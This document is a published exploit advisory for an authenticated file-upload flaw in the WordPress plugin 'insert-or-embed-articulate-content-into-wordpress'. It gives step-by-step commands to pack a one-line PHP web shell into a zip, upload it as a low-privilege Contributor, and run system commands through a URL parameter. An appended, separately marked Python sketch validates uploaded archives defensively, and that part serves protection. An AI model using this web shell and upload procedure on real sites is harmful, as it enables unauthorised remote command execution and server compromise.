# Exploit Title: Authenticated code execution in `insert-or-embed-articulate-content-into-wordpress` WordPress plugin
# Description: It is possible to upload and execute a PHP file using the plugin option to upload a zip archive
# Date: June 2019
# Exploit Author: xulchibalraa
# Vendor Homepage: https://wordpress.org/plugins/insert-or-embed-articulate-content-into-wordpress/
# Software Link: https://downloads.wordpress.org/plugin/insert-or-embed-articulate-content-into-wordpress.4.2995.zip
# Version: 4.2995 <= 4.2997
# Tested on: WordPress 5.1.1, PHP 5.6
# CVE : -

## 1. Create a .zip archive with 2 files: index.html, index.php

echo "<html>hello</html>" > index.html
echo "<?php echo system($_GET['cmd']); ?>" > index.php
zip poc.zip index.html index.php

## 2. Log in to wp-admin with any user role that has access to the plugin functionality (by default even the `Contributors` role has access to it)
## 3. Create a new Post -> Select `Add block` -> E-Learning -> Upload the poc.zip -> Insert as: Iframe -> Insert (just like in tutorial https://youtu.be/knst26fEGCw?t=44 ;)
## 4. Access the webshell from the URL displayed after upload, similar to

http://website.com/wp-admin/uploads/articulate_uploads/poc/index.php?cmd=whoami
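
Added example, not part of the original advisory or the plugin's code: a pre-extraction check, sketched in Python, that rejects an archive like the one built in step 1 before anything is written under the uploads directory. The allow-list, the PHP suffix prefixes, the function names and the sample entries are assumptions made for illustration.

```python
import io
import zipfile

# Assumption: static file types a course export needs; tune to real content.
ALLOWED_FINAL_EXT = {"html", "htm", "js", "css", "json", "xml", "txt", "png",
                     "jpg", "jpeg", "gif", "mp3", "mp4", "woff", "woff2"}
# Assumption: suffixes starting with these may be mapped to the PHP handler.
PHP_PREFIXES = ("php", "pht", "phar")


def rejected_entries(zip_bytes):
    """Return {entry name: reason} for entries that must block extraction."""
    problems = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as archive:
        for info in archive.infolist():
            if info.is_dir():
                continue
            parts = info.filename.replace("\\", "/").split("/")
            base = parts[-1]
            suffixes = [s.lower() for s in base.split(".")[1:]]
            if info.filename.startswith(("/", "\\")) or ".." in parts:
                problems[info.filename] = "path escapes the upload directory"
            elif base.startswith(".") or not suffixes:
                problems[info.filename] = "dotfile or no extension"
            elif any(s.startswith(PHP_PREFIXES) for s in suffixes):
                # Inner suffixes count too: "x.php.png" can run as PHP on servers
                # that pick a handler from any extension in the file name.
                problems[info.filename] = "PHP-handled extension"
            elif suffixes[-1] not in ALLOWED_FINAL_EXT:
                problems[info.filename] = "extension not on the allow-list"
    return problems


def build_sample_archive():
    """Constructed sample shaped like the archive in step 1, plus edge cases."""
    names = ("index.html", "index.php", "img/logo.PHP.png", ".htaccess",
             "../escape.html", "js/jquery.min.js")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        for name in names:
            archive.writestr(name, "placeholder")  # contents are irrelevant here
    return buf.getvalue()


if __name__ == "__main__":
    for name, reason in rejected_entries(build_sample_archive()).items():
        print(f"REJECT {name}: {reason}")
```

An upload handler would refuse the whole archive when the returned mapping is non-empty; disabling PHP execution for the uploads directory in the web-server configuration covers the case where a file slips through.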